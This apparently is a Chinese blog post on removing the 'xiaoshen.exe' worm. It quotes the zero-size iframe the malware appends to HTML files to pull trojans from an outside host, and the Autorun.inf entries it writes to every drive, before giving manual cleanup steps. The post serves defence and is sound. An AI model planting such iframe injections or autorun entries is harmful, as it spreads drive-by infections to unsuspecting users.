heng.com使得所有htm html文件
都会在末段 添加如下代码:
<iframe src="http://qq.ee28.cn/htm/" width="0" height="0" frameborder="0"></iframe>
使得下载一些木马程序,并更改一些.exe文件关联,只能改成.com运行,我被感染时SREng的应用程序文件就只能将扩展名改成.com后才能使用
xiaoshen.exe
不能双击盘符进入,右键出现Auto选项,隐藏文件不能被显示
后台下载病毒,每次开机都出现 Trojan.InjectCode.a 病毒,感染QQ文件
用SREng扫描后出现:
Autorun.inf
[C:/]
[AutoRun]
Open=xiaoshen.exe
shellexecute=xiaoshen.exe
shell/Auto/command=xiaoshen.exe
[D:/]
[AutoRun]
Open=xiaoshen.exe
shellexecute=xiaoshen.exe
shell/Auto/command=xiaoshen.exe
[E:/]
[AutoRun]
Open=xiaoshen.exe
shellexecute=xiaoshen.exe
shell/Auto/command=xiaoshen.exe
[F:/]
[AutoRun]
Open=xiaoshen.exe
shellexecute=xiaoshen.exe
shell/Auto/command=xiaoshen.exe
出现被更改的服务:
C:/WINDOWS/System32/new.sys
[13332375 / 13332375]
<C:/WINDOWS/SYSTEM32/DRIVERS/13332375.SYS><N/A>
C:/Program Files/Common Files/Microsoft Shared/MSINFO/3CDF1368.dll>
处理方法:
修复:
New0 / New0]
</??/C:/WINDOWS/System32/new.sys><N/A>
<{F1363CDF-3CDF-1368-DF13-CDF36CDF1368}><C:/Program Files/Common Files/Microsoft Shared/MSINFO/3CDF1368.dll> [N/A]
重启,删除
C:/WINDOWS/System32/new.sys
[13332375 / 13332375]
<C:/WINDOWS/SYSTEM32/DRIVERS/13332375.SYS><N/A>
C:/Program Files/Common Files/Microsoft Shared/MSINFO/3CDF1368.dll>
显示隐藏文件,右键打开各分区,删去xiaoshen.exe Autorun.inf
xiaoshen.exe近期肆虐,让很多人为之困惑,解决步骤:
1.用SREng扫描日志
2.观察日志,查找可疑进程和服务(PS:不能确定的可以去搜索引擎查看或把日志贴到网上,如个杀毒软件的论坛里,请高手们帮忙分析)
3.结束可以进程,可以用冰刃(Icesword)结束不能结束的进程
安全模式删除病毒文件,不能删的用Pocket KillBox干掉
删除注册表中病毒的相关信息,在注册表中查找病毒文件的相关信息(切记删之前备份下注册表)
4.重启,升级杀毒软件杀毒(这步其实挺关键——自认为,有些我们结束了病毒插入进程的程序和注册表的程序运行关联,但有些病毒文件我们可能并没有手工删除掉,这个时候就要靠杀毒软件来帮我们清理一下这些“脏东西”)
3327
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
